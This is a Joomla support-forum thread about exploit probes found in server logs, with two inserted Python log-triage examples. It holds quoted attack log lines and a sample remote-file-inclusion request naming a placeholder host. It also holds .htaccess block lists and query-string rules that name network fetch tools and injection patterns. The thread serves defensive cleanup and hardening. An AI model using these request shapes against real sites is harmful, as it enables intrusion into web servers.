If I patch my Joomla...

Postby juanpablo321 » Thu Jan 29, 2009 4:13 am

Hi.
I know the key is in keeping my Joomla updated. But now I have a serious problem. I have a lot of exploits on my site like this:
84.158.161.7 - - [27/Jan/2009:08:53:37 -0500] "GET /media/secure/www.halifax-online.co.uk/_mem_/formslogin.asp HTTP/1.1" 404 524 "-" "Mozilla/666.6 libwww-perl/5.814"

I am patching my sites but I want to know if this will remove the exploits. If not, how can I remove them?

Thank you!
God Bless whom created the forum!

Re: If I patch my Joomla...

Postby PatSch001 » Thu Jan 29, 2009 8:21 am

Note, these are attempted exploits on your site, (the 404 status shows they were not successful) :)

Make sure you have gone through the Security Checklist (http://docs.joomla.org/Joomla!_Administrators_Security_Checklist)

The default htaccess included with Joomla has some rules to block this; otherwise, search this forum for 'libwww-perl' and you'll get a pile of information.

Regards
Patrick

Re: If I patch my Joomla...

Postby juanpablo321 » Thu Jan 29, 2009 11:05 pm

PatSch001 wrote:...The default htaccess included with Joomla has some rules to block this otherwise search this forum for 'libwww-perl' and you'll get a pile of information.

Regards
Patrick


Thank you for your information Patrick.

We have solved the problem by looking for the IP address associated with the exploit. Finally we found their location and proceeded to remove them.
Here is one of them:
/var/www/vhosts/mycustomerdomain.com/statistics/logs/access_log:(the-fuc#%_ip-address)128.232.110.18 - - [28/Jan/2009:06:06:38 -0500] "GET /components/secure/www.halifax-online.co.uk/_mem_/formslogin.asp/ HTTP/1.1" 200 27058 "-" "Mozilla/4.0 (compatible MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

We removed all the files in the /tmp folder too and disabled the Perl service. We don't use them.

The warning from the hosting provider about suspending my service for "being dangerous for other hosts" has been removed.

Lesson:
1. Keep our Joomla installations updated... http://www.joomla.org/download.html
2. Keep the extensions updated too.
3. Frequently check the access_log.processed file of my sites for suspicious access.
4. Backup my sites frequently.

zgrep "?*=http://" /var/www/vhosts/*/statistics/logs/access_log*| awk '/Jan/ && /libww/ && $9 !~/^4/'
Last edited by juanpablo321 on Fri Jan 30, 2009 1:40 pm, edited 1 time in total.
God Bless whom created the forum!
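
The distinction drawn in this thread (a 404 is a failed probe, a 200 means something was actually served), as an added Python example that is not code from any poster. It flags requests by three indicators: the libwww-perl agent, a URL passed in a query parameter (what the zgrep above looks for), and a path containing a hostname-like directory (an assumed heuristic). The first two sample lines are the ones quoted in the thread with the file prefix shortened; the other two are constructed.

```python
import re

# Apache "combined" log format. search() is used so that a "file:" prefix
# added by grep/zgrep in front of the client IP is tolerated.
LINE_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Each indicator receives (path, query, user_agent) and returns True/False.
INDICATORS = {
    "scripted-client": lambda path, query, ua: "libwww-perl" in ua.lower(),
    "url-in-parameter": lambda path, query, ua: bool(
        re.search(r"=(?:https?|ftp)(?::|%3a)//", query, re.I)),
    # Assumed heuristic: a directory named like a web host inside the site tree.
    "hostname-directory": lambda path, query, ua: bool(
        re.search(r"/www\.[a-z0-9-]+(?:\.[a-z]{2,})+/", path, re.I)),
}


def triage(lines):
    """Split suspicious requests into 'served' (2xx/3xx) and 'rejected' (4xx/5xx)."""
    report = {"served": [], "rejected": []}
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m["url"].partition("?")
        reasons = [name for name, check in INDICATORS.items()
                   if check(path, query, m["ua"])]
        if not reasons:
            continue  # nothing suspicious about this request
        bucket = "served" if m["status"][0] in "23" else "rejected"
        report[bucket].append({"ip": m["ip"], "status": int(m["status"]),
                               "url": m["url"], "reasons": reasons})
    return report


SAMPLE_LOG = [
    # Quoted in the thread:
    '84.158.161.7 - - [27/Jan/2009:08:53:37 -0500] "GET /media/secure/www.halifax-online.co.uk/_mem_/formslogin.asp HTTP/1.1" 404 524 "-" "Mozilla/666.6 libwww-perl/5.814"',
    'access_log:128.232.110.18 - - [28/Jan/2009:06:06:38 -0500] "GET /components/secure/www.halifax-online.co.uk/_mem_/formslogin.asp/ HTTP/1.1" 200 27058 "-" "Mozilla/4.0 (compatible MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"',
    # Constructed for this example (com_example and example.invalid are placeholders):
    '203.0.113.9 - - [28/Jan/2009:07:15:02 -0500] "GET /index.php?option=com_example&mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.814"',
    '198.51.100.23 - - [28/Jan/2009:07:16:40 -0500] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 18342 "http://www.example.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"',
]

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for bucket in ("served", "rejected"):
        print(bucket.upper())
        for hit in result[bucket]:
            print("  {ip} {status} {url} {reasons}".format(**hit))
```

A 200 on index.php only shows that Joomla answered, not that the include worked, so the entries under served are a list of paths and requests to inspect on disk, not a verdict.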

Re: If I patch my Joomla...

Postby brad » Fri Jan 30, 2009 1:01 am

What version of Joomla are you running?
Brad Baker
http://www.rochen.com - Joomla! Hosting, the correct way.
https://www.joomlatutorials.com <-- Joomla Help & Tutorials

Re: If I patch my Joomla...

Postby mandville » Fri Jan 30, 2009 1:31 am

apart from running the joomla forum assistant

and this was blatantly stolen from a google search
http://www.askapache.com/htaccess/block ... ccess.html

add to your htaccess file, make sure your folders have the correct permissions

ErrorDocument 403 /403.html

RewriteEngine On
RewriteBase /

# IF THE UA STARTS WITH THESE
RewriteCond %{HTTP_USER_AGENT} ^(aesop_com_spiderman|alexibot|backweb|bandit|batchftp|bigfoot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(black.?hole|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cheesebot|cherrypicker|chinaclaw|collector|copier|copyrightcheck) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cosmos|crescent|curl|custo|da|diibot|disco|dittospyder|dragonfly) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(drip|easydl|ebingbong|ecatch|eirgrabber|emailcollector|emailsiphon) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(emailwolf|erocrawler|exabot|eyenetie|filehound|flashget|flunky) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(frontpage|getright|getweb|go.?zilla|go-ahead-got-it|gotit|grabnet) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(grafula|harvest|hloader|hmview|httplib|httrack|humanlinks|ilsebot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(infonavirobot|infotekies|intelliseek|interget|iria|jennybot|jetcar) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(joc|justview|jyxobot|kenjin|keyword|larbin|leechftp|lexibot|lftp|libweb) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(likse|linkscan|linkwalker|lnspiderguy|lwp|magnet|mag-net|markwatch) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mata.?hari|memo|microsoft.?url|midown.?tool|miixpc|mirror|missigua) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mister.?pix|moget|mozilla.?newt|nameprotect|navroad|backdoorbot|nearsite) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(net.?vampire|netants|netcraft|netmechanic|netspider|nextgensearchbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(attach|nicerspro|nimblecrawler|npbot|octopus|offline.?explorer) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(offline.?navigator|openfind|outfoxbot|pagegrabber|papa|pavuk) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(pcbrowser|php.?version.?tracker|pockey|propowerbot|prowebwalker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(psbot|pump|queryn|recorder|realdownload|reaper|reget|true_robot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(repomonkey|rma|internetseer|sitesnagger|siphon|slysearch|smartdownload) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(snake|snapbot|snoopy|sogou|spacebison|spankbot|spanner|sqworm|superbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(superhttp|surfbot|asterias|suzuran|szukacz|takeout|teleport) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(telesoft|the.?intraformant|thenomad|tighttwatbot|titan|urldispatcher) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(turingos|turnitinbot|urly.?warning|vacuum|vci|voideye|whacker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(libwww-perl|widow|wisenutbot|wwwoffle|xaldon|xenu|zeus|zyborg|anonymouse) [NC,OR]

# STARTS WITH WEB
RewriteCond %{HTTP_USER_AGENT} ^web(zip|emaile|enhancer|fetch|go.?is|auto|bandit|clip|copier|master|reaper|sauger|site.?quester|whack) [NC,OR]

# ANYWHERE IN UA -- GREEDY REGEX
RewriteCond %{HTTP_USER_AGENT} ^.*(craftbot|download|extract|stripper|sucker|ninja|clshttp|webspider|leacher|collector|grabber|webpictures).*$ [NC]

# ISSUE 403 / SERVE ERRORDOCUMENT
RewriteRule . - [F,L]


and perhaps inform the sourcing IP that put the POST command
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

Re: If I patch my Joomla...

Postby juanpablo321 » Fri Jan 30, 2009 1:36 pm

brad wrote:What version of Joomla are you running?

I have a (dv) server and I have hosted around 80 sites there, most of them with Joomla.
The sites that were attacked were using different Joomla versions, all of them with something in common: out of date. I know what you are thinking. I'll keep them updated now.
Thanks for your usable posts.
God Bless whom created the forum!

Re: If I patch my Joomla...

Postby juanpablo321 » Fri Jan 30, 2009 2:00 pm

mandville wrote:apart from running the joomla forum assistant

and this was blatantly stolen from a google search
http://www.askapache.com/htaccess/block ... ccess.html

add to your htaccess file , make sure your folders have the correct permissions

ErrorDocument 403 /403.html....

---
...and perhaps inform the sourcing IP that put the POST command


Do I have to add this code in my .htaccess file? Is it safe? Could I add it in all my sites although they use different Joomla Versions?
:pop
God Bless whom created the forum!

Re: If I patch my Joomla...

Postby mandville » Fri Jan 30, 2009 6:32 pm

Yes, it is safe (depends on your server configuration to its effectiveness though!)

here is a sample to show how it's used on several j1.5.9 installs I have
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that disallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

RewriteEngine On

SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^Libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^DataCha0s/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.1" bad_bot
SetEnvIfNoCase User-Agent "^StackRambler/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>


HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

Re: If I patch my Joomla...

Postby juanpablo321 » Mon Feb 02, 2009 6:58 am

Thank you mandville
God Bless whom created the forum!

Re: If I patch my Joomla...

Postby SpellenArena » Fri May 28, 2010 3:35 am

In joomla 1.5.17 there's also the following in the .htaccess file:

## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files

Can I use these with the above example from mandville?

Re: If I patch my Joomla...

Postby mandville » Sat May 29, 2010 12:37 am

i would use the newest version of the htaccess file with any modifications you wish for your server settings but mainly the bad_bot list
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

Re: If I patch my Joomla...

Postby mandville » Tue Jun 08, 2010 10:15 am

caution - found that the line

SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

MAY block most versions of IE!
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}
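
mandville's caution about the Mozilla/4.0 line, checked in code: an added Python example (not from any poster) that runs the bad_bot patterns posted earlier in the thread against sample User-Agent strings. Two of the strings come from the log lines quoted in this thread, the rest are constructed, and ADJUSTED_RULES is an illustrative assumption of this example.

```python
import re

# Patterns copied from the SetEnvIfNoCase lines posted earlier in the thread.
POSTED_RULES = [
    "^EmailSiphon", "^EmailWolf", "^ExtractorPro", "^CherryPicker",
    "^NICErsPRO", "^Teleport", "^EmailCollector", "^LinkWalker", "^Zeus",
    "^Libwww-perl", "^DataCha0s/2.0", "^Wget/1.1", "^StackRambler/2.0",
    "^Mozilla/4.0",
]

# Illustrative adjustment (an assumption, not from the thread): drop the
# rule that matches Internet Explorer and un-anchor the libwww-perl rule.
ADJUSTED_RULES = [p for p in POSTED_RULES
                  if p not in ("^Mozilla/4.0", "^Libwww-perl")] + ["libwww-perl"]

# (label, User-Agent string, should this client be blocked?)
SAMPLES = [
    ("IE 7 string from the 200 log line in the thread",
     "Mozilla/4.0 (compatible MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
     False),
    ("IE 8 (constructed)",
     "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", False),
    ("Firefox 3 (constructed)",
     "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5",
     False),
    ("probe string from the 404 log line in the thread",
     "Mozilla/666.6 libwww-perl/5.814", True),
    ("plain libwww-perl (constructed)", "libwww-perl/5.814", True),
]


def matching_rules(user_agent, rules):
    """Return the rules that would set bad_bot for this User-Agent.

    SetEnvIfNoCase applies the regex case-insensitively and unanchored,
    so only an explicit ^ ties a pattern to the start of the header.
    """
    return [p for p in rules if re.search(p, user_agent, re.IGNORECASE)]


def audit(rules, samples=SAMPLES):
    """List the samples a rule set blocks wrongly or fails to block."""
    result = {"false_positive": [], "false_negative": []}
    for label, user_agent, should_block in samples:
        blocked = bool(matching_rules(user_agent, rules))
        if blocked and not should_block:
            result["false_positive"].append(label)
        elif should_block and not blocked:
            result["false_negative"].append(label)
    return result


if __name__ == "__main__":
    for name, rules in (("posted", POSTED_RULES), ("adjusted", ADJUSTED_RULES)):
        print(name, audit(rules))
```

The User-Agent header is chosen by the client, so rules like these only cut noise from unsophisticated scripts and do not stand in for keeping Joomla and its extensions patched.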

Re: If I patch my Joomla...

Postby fw116 » Tue Jun 08, 2010 3:48 pm

mandville wrote:caution - found that the line

SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

MAY block most versions of IE!


yeah heaven :D :p

Re: If I patch my Joomla...

Postby Jack_Sparow » Mon Feb 21, 2011 5:23 pm

Thanks for this 1. :D

Re: If I patch my Joomla...

Postby bruce99 » Tue Feb 22, 2011 2:52 am

Hi all,

I have a joomla site about a year or so old, but have just created one from the latest version from crazy domains in Aust. The reason that I chose joomla again was that the templates are a great idea, mostly it's free and I thought it was fairly safe.

Security is never really mentioned a great deal when you first select joomla. Are the attacks targeted, is it a pretty easy app to penetrate and what damage can be done? Originally I thought that my virus protection would stop issues for me, but of course that's for programs on my PC not the host where my site is held.

Like many people who use joomla I am not a coder and hacking code is always fraught with risk when you are completely reliant on forum advice. Does anyone really know how vulnerable joomla is, are there any quick fixes (for a novice) and do you suggest an easy to use back up program in case things go wrong - plus WILL the backup restore the whole site including links and articles or what? -
I am a dog walker and have two dog information sites: dogwalkersmelbourne.com.au & a dog treat site, Thank you.

Re: If I patch my Joomla...

Postby PhilD » Tue Feb 22, 2011 2:07 pm

@bruce99
While nothing exposed to the web is 100% safe, you don't have to hack anything to be safe with Joomla. The current version of Joomla 1.5.22 is secure with no known security issues. Joomla is no more vulnerable to attack than any other CMS program. In fact it may be more secure as a main focus of the developers is security while maintaining ease of use. Not an easy task I might say.

I would not attempt applying the code from the above posts. This is especially true since you're not comfortable with attempting any of it. In fact I would not recommend applying any code, core hack, or modification you're not comfortable with. This is especially true with code examples found in the forums.

There are some modifications you can do to increase security that can be found in the official documentation. These modifications have been tested on many servers and generally work as advertised. Again, if you're not comfortable performing modifications at this point, then don't do them. Joomla is secure enough in the default install to not need any modification (except for enabling the htaccess file - see below)

Some tips

do use a modern quality hosting service. Preferably one that uses mod_security, php 5, suexec. You mostly get what you pay for. (what do you expect for free or nearly free? Fort Knox from someone who cares about security?) Be aware of some really popular heavily advertised hosting services also. They seem to have a larger than average share of issues with their servers being hacked.

Don't use an offer by the hosting company (your domains control panel one click install). Many of these services are not on the latest version, are slow to offer security updates, and can make it rather hard sometimes to know just where Joomla was installed. The install scripts used by these services may also force insecure file/directory permissions which you won't know about until it's too late.

do always keep files at 644 (or tighter) permissions and directories at 755 (or tighter) permissions. 644/755 are normal server defaults and are reasonably safe.

Do install the latest Joomla version. By controlling your own installation directly, you can easily apply updates or security patches to the Joomla core files.

do enable the htaccess.txt file by renaming the file to .htaccess. You can do this using an ftp program. This file contains some code to stop some exploits and should always be enabled.

do keep all 3rd party extensions updated. This is most important as most issues with hacked websites arise from the use of outdated or insecure 3rd party extensions.

do use good strong passwords. 12 characters long for a super admin is normally long enough.

do consider changing the super admin password on a regular basis.

do use a password manager such as KeePass for all your passwords.

do create a new super admin account and change using the new super admin account after successful admin login then delete the old one

do keep your computers anti-virus updated and also run additional checks such as malwarebytes on a regular basis. Reason for this is that even good trusted sites may become infected with malware that will silently download malware to your computer for the only purpose of finding and stealing passwords. ftp programs are frequently targeted. once the user name and password are stolen it is easy to log in to your site and cause problems.

Make backups of both the database and the files found in your public_html directory on a regular basis. database is where your data is stored and the public_html directory is where the files and templates that use this data to assemble the pages reside.

do read and learn more about security from our extensive doc files. Even if you ultimately decide not to use Joomla, most of the information applies to your domain in general.

http://docs.joomla.org/Category:Security_Checklist

http://docs.joomla.org/Security_Checklist_7

http://docs.joomla.org/Vulnerable_Extensions_List

If you do these things, there is no need to hack, program, sort through htaccess rules.

Articles, links, categories, sections etc are all stored in the database. photos, images, files for download are normally stored in public_html in the appropriate directory
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

Re: If I patch my Joomla...

Postby bruce99 » Tue Feb 22, 2011 11:34 pm

Hi Phil D,

An excellent answer. I did use the one click install, but my host seems good. I have the latest version joomla. I already renamed the htaccess for enabling seo in the urls.

I guess most development will now be pushed to joomla 1.6, but I went with 1.5 for an established stability and number of extensions available.

Do you have a recommendation for a good back up in the extensions library? As long as it does the job simply and there is some documentation I will be there.

I really appreciate the active experienced users answering questions in this forum ... as while working on my site without tech skills has been daunting, I have mostly resolved the major issues. Mostly it's about how to display the data such as trying to get a good article display page, like latest news ... but sometimes you have to let the little questions go just to get sites up. Will keep plugging away. Thanks again! B
I am a dog walker and have two dog information sites: dogwalkersmelbourne.com.au & a dog treat site, Thank you.

Re: If I patch my Joomla...

Postby mandville » Tue Feb 22, 2011 11:51 pm

i suggest that you check the permissions on the files and folders, using akeeba admin tools is a good easy way of doing it
http://extensions.joomla.org/extensions ... tion/14087
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

